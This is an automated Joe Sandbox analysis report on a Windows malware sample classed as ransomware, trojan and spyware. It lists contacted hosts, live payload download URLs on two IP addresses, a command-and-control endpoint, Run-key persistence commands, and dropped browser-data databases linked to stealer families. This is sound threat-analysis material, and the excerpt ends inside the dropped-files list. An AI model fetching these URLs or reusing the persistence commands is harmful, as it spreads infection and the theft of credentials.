https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000001E.00000003.3592024012.0000599C00D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3591453155.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3595720806.0000599C00D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3592693960.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.orgD	t0IHakP.exe, 0000001D.00000002.4813359985.00000000035E2000.00000004.00000800.00020000.00000000.sdmp, t0IHakP.exe, 0000001D.00000002.4813359985.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/4836	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 0000001E.00000002.4123783084.0000599C00BDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exes	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mindhandru.buzz:443/api	i8Vwc7iOaG.exe, 00000000.00000003.2205372102.0000000001242000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2349035521.0000000001242000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://31.41.244.11/files/winston/random.exe?	skotes.exe, 0000000B.00000002.4677077995.000000000094C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/mine/random.exeM$R	i8Vwc7iOaG.exe, 00000000.00000003.2483123901.00000000012BF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.16/steam/random.exea	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/winston/random.exeH&t	skotes.exe, 0000000B.00000002.4677077995.000000000094C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exej	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	i8Vwc7iOaG.exe, 00000000.00000003.2177753619.0000000005A5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	i8Vwc7iOaG.exe, 00000000.00000003.2177753619.0000000005A5B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exed	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/5195048147/hmUaBuJ.exe	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.16/steam/random.exec	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3970	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	chrome.exe, 0000001E.00000002.4131718103.0000599C013F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3632552875.0000599C01468000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3633170775.0000599C0142C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe6ncoded	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	BitLockerToGo.exe, 0000001A.00000002.4654918629.000000000615D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeW	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://31.41.244.11/files/martin/random.exe(	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 0000001E.00000003.3597537251.0000599C00C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597585144.0000599C00A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3597636556.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3593825702.0000599C00F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3594405336.0000599C00F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://labs.google.com/search?source=ntp	chrome.exe, 0000001E.00000002.4062687485.0000599C00428000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000001E.00000003.3579705583.0000434C0071C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeA	skotes.exe, 0000000B.00000002.4639051355.0000000000770000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive-daily-5.corp.go	chrome.exe, 0000001E.00000002.4061799797.0000599C0031C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe=	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5901	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4058943631.0000599C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exeI	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4123184952.0000599C00ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 0000001E.00000003.3589406060.0000599C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/steam/random.exe7	skotes.exe, 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	chrome.exe, 0000001E.00000003.3590984180.0000599C006FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	k0ukcEH.exe, 0000001B.00000003.3527021977.0000000001751000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload	chrome.exe, 0000001E.00000003.3583113497.0000434C00878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599170074.0000599C01178000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000002.4058320134.0000434C00920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3599322174.0000599C0120C000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
172.67.157.254	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.19.206	unknown	United States	15169	GOOGLEUS	false
104.21.44.66	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.19.227	unknown	United States	15169	GOOGLEUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
104.18.10.31	unknown	United States	13335	CLOUDFLARENETUS	false
149.154.167.99	unknown	United Kingdom	62041	TELEGRAMRU	false
142.250.181.138	unknown	United States	15169	GOOGLEUS	false
149.154.167.220	unknown	United Kingdom	62041	TELEGRAMRU	false
172.67.209.202	unknown	United States	13335	CLOUDFLARENETUS	false
172.217.21.35	unknown	United States	15169	GOOGLEUS	false
142.250.181.68	unknown	United States	15169	GOOGLEUS	false
172.217.21.36	unknown	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
172.217.19.238	unknown	United States	15169	GOOGLEUS	false
172.67.165.185	unknown	United States	13335	CLOUDFLARENETUS	false
116.203.8.178	unknown	Germany	24940	HETZNER-ASDE	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.121.10.34	unknown	United States	16625	AKAMAI-ASUS	false
45.89.196.115	unknown	Russian Federation	35913	DEDIPATH-LLCUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.19.24	unknown	United States	13335	CLOUDFLARENETUS	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.16.185.241	unknown	United States	13335	CLOUDFLARENETUS	false
64.233.161.84	unknown	United States	15169	GOOGLEUS	false
173.194.220.84	unknown	United States	15169	GOOGLEUS	false
172.217.19.10	unknown	United States	15169	GOOGLEUS	false
172.67.150.49	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.181.74	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580865
Start date and time:	2024-12-26 12:36:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	i8Vwc7iOaG.exe renamed because original name is a hash value
Original Sample Name:	646b8b4f1120776d924259da33f0e73d.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@128/242@0/33
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Execution Graph export aborted for target Y71AV1VIPLT8Y663WBDXSB.exe, PID 6448 because there are no executed function
Execution Graph export aborted for target i8Vwc7iOaG.exe, PID 3640 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
06:37:05	API Interceptor	97x Sleep call for process: i8Vwc7iOaG.exe modified
06:38:01	API Interceptor	3875588x Sleep call for process: skotes.exe modified
06:38:13	API Interceptor	112057x Sleep call for process: Y71AV1VIPLT8Y663WBDXSB.exe modified
06:39:21	API Interceptor	10x Sleep call for process: k0ukcEH.exe modified
06:39:42	API Interceptor	8x Sleep call for process: UfEglUg.exe modified
06:39:43	API Interceptor	4x Sleep call for process: soonmaintain.exe modified
06:39:51	API Interceptor	690x Sleep call for process: t0IHakP.exe modified
06:40:01	API Interceptor	8x Sleep call for process: dea82620d5.exe modified
06:40:02	API Interceptor	1417x Sleep call for process: axplong.exe modified
12:37:51	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
12:39:00	Task Scheduler	Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
12:40:14	Task Scheduler	Run new task: defnur path: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
12:40:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wsnn cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\wsnn.exe"
12:41:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run GoogleChrome C:\Users\user\AppData\Local\Temp\CumkPzqX\o6lhRwgsJeOrZwGS.exe
12:41:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 28c520debd.exe C:\Users\user\AppData\Local\Temp\1008943001\28c520debd.exe
12:41:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fd096224d5.exe C:\Users\user\AppData\Local\Temp\1023288001\fd096224d5.exe
12:41:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wsnn cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\wsnn.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	uLkHEqZ3u3.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig	Browse	185.215.113.43/Zu7JuNko/index.php
172.67.157.254	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse
	3zg6i6Zu1u.exe	Get hash	malicious	LummaC	Browse
	L5Kgf2Tvkc.exe	Get hash	malicious	LummaC	Browse
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	Bire1g8ahY.exe	Get hash	malicious	LummaC, Stealc	Browse
	NfwBtCx5PR.exe	Get hash	malicious	LummaC	Browse
	pJRiqnTih0.exe	Get hash	malicious	LummaC	Browse
	xxLuwS60RS.exe	Get hash	malicious	LummaC	Browse
	9pyUjy2elE.exe	Get hash	malicious	LummaC	Browse
104.21.44.66	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ZX2M0AXZ56.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
CLOUDFLARENETUS	ZX2M0AXZ56.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
WHOLESALECONNECTIONSNL	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse	185.215.113.206
	O5Vg1CJsxN.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	y001L6lEK4.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
CLOUDFLARENETUS	6GNqkkKY0j.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	0Pm0sadcCP.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.11.101
	TTsfmr1RWm.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	COBYmpzi7q.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	rwFNJ4pHWG.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Ebgl8jb6CW.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	lBsKTx65QC.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	35K4Py4lii.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	dEugughckk.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	Solara-v3.0.exe	Get hash	malicious	LummaC	Browse	172.67.165.185

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	glpEv3POe7.exe	Get hash	malicious	Stealc, Vidar	Browse
	gYjK72gL17.exe	Get hash	malicious	Stealc, Vidar	Browse
	iUKUR1nUyD.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	cMTqzvmx9u.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine	Browse
	ElmEHL9kP9.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	xlSzrIs5h6.exe	Get hash	malicious	LummaC, Stealc	Browse
	1lhZVZx5nD.exe	Get hash	malicious	Stealc, Vidar	Browse
	Qsqi9KQXgy.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	uLkHEqZ3u3.exe	Get hash	malicious	LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar	Browse
	FnTSHWLNWB.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BFBGHDGCFHIDBGDGIIIEHIJDAF

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECAFHIIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EGCFIDAFBFBAKFHJEGIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IECBGIDA

Download File

Process:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDAEHJJECAEGCAAAAEGI

Download File

